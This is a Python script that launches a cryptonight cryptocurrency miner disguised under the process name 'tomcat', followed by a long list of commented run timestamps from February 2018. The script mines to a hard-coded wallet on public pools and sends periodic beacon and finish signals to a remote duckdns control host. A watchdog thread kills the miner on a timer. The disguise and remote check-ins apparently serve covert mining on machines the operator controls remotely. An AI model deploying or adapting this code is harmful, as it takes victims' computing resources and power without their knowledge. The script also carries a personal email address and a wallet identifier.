import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:44:07.259928
#2018-02-17 16:32:07.168063
#2018-02-17 18:20:01.371508
#2018-02-17 20:07:07.225261
#2018-02-17 21:54:07.001285
#2018-02-17 23:39:01.897864
#2018-02-18 01:28:05.792767
#2018-02-18 03:02:04.412791
#2018-02-18 04:36:01.387003
#2018-02-18 06:16:04.713682
#2018-02-18 07:47:08.144731
#2018-02-18 09:18:07.343860
#2018-02-18 10:50:09.782835
#2018-02-18 12:21:06.631869
#2018-02-18 13:54:07.772699
#2018-02-18 15:34:07.794534
#2018-02-18 17:08:04.888228
#2018-02-18 18:42:06.260853
#2018-02-18 20:12:06.032051
#2018-02-18 21:45:05.892418
#2018-02-18 23:19:06.425741
#2018-02-19 00:51:06.931697
#2018-02-19 02:23:07.394308
#2018-02-19 03:56:06.821408
#2018-02-19 05:27:07.857430
#2018-02-19 07:02:05.945462
#2018-02-19 08:39:05.787600
#2018-02-19 10:14:07.787382
#2018-02-19 11:46:10.517090
#2018-02-19 13:17:07.450704
#2018-02-19 14:48:10.490327
#2018-02-19 16:23:09.130101
#2018-02-19 17:56:08.092873
#2018-02-19 19:29:02.182110
#2018-02-19 21:03:02.102945
#2018-02-19 22:36:07.350728
#2018-02-20 00:06:08.234595
#2018-02-20 01:41:02.052486
#2018-02-20 03:17:01.568619
#2018-02-20 04:49:07.585591
#2018-02-20 06:20:01.598043
#2018-02-20 07:53:06.489176
#2018-02-20 09:26:06.749214
#2018-02-20 10:57:06.488187
#2018-02-20 12:36:01.399961
#2018-02-20 14:10:04.782215
#2018-02-20 15:42:11.304059
#2018-02-20 17:17:07.244322
#2018-02-20 18:52:04.911183
#2018-02-20 20:41:06.971910
#2018-02-20 22:25:07.955392
#2018-02-21 00:06:07.177905
#2018-02-21 01:53:07.585083
#2018-02-21 03:42:07.605261
#2018-02-21 05:29:03.662936
#2018-02-21 07:17:05.180190
#2018-02-21 09:02:05.415478
#2018-02-21 10:50:09.097548
#2018-02-21 12:37:01.860572
#2018-02-21 14:26:01.792297
#2018-02-21 16:12:10.322034
#2018-02-21 18:04:08.727213
#2018-02-21 19:51:02.118510
#2018-02-21 21:39:04.175606
#2018-02-21 23:26:03.747670
#2018-02-22 01:16:05.538974
#2018-02-22 03:05:06.493750
#2018-02-22 04:51:02.158588
#2018-02-22 06:36:01.254178
#2018-02-22 08:24:05.650887
#2018-02-22 10:12:07.407213
#2018-02-22 11:58:09.602681
#2018-02-22 13:44:01.739613
#2018-02-22 15:32:06.435550
#2018-02-22 17:20:10.160300
#2018-02-22 19:07:06.811103
#2018-02-22 21:01:05.421665
#2018-02-22 22:47:09.150585
#2018-02-23 00:36:06.827350
#2018-02-23 02:21:01.884948
#2018-02-23 04:09:05.345229
#2018-02-23 05:56:06.551720
#2018-02-23 07:46:06.727622
#2018-02-23 09:48:01.282439
#2018-02-23 11:53:08.536028
#2018-02-23 13:42:05.211488
#2018-02-23 15:29:08.060854
#2018-02-23 17:19:06.017272
#2018-02-23 19:03:01.662557
#2018-02-23 20:49:01.787812
#2018-02-23 22:34:06.927046
#2018-02-24 00:20:10.808788
#2018-02-24 02:13:04.963738
#2018-02-24 04:02:07.635748
#2018-02-24 05:47:05.748560
#2018-02-24 07:39:06.329872
#2018-02-24 09:24:07.196162
#2018-02-24 11:18:02.117175
#2018-02-24 13:07:04.557497
#2018-02-24 14:56:04.673764
#2018-02-24 16:46:01.360245
#2018-02-24 18:34:01.292700
#2018-02-24 20:21:03.337537
#2018-02-24 22:16:07.373045
#2018-02-25 01:25:03.661068
#2018-02-25 05:29:05.135750
#2018-02-25 11:35:03.810046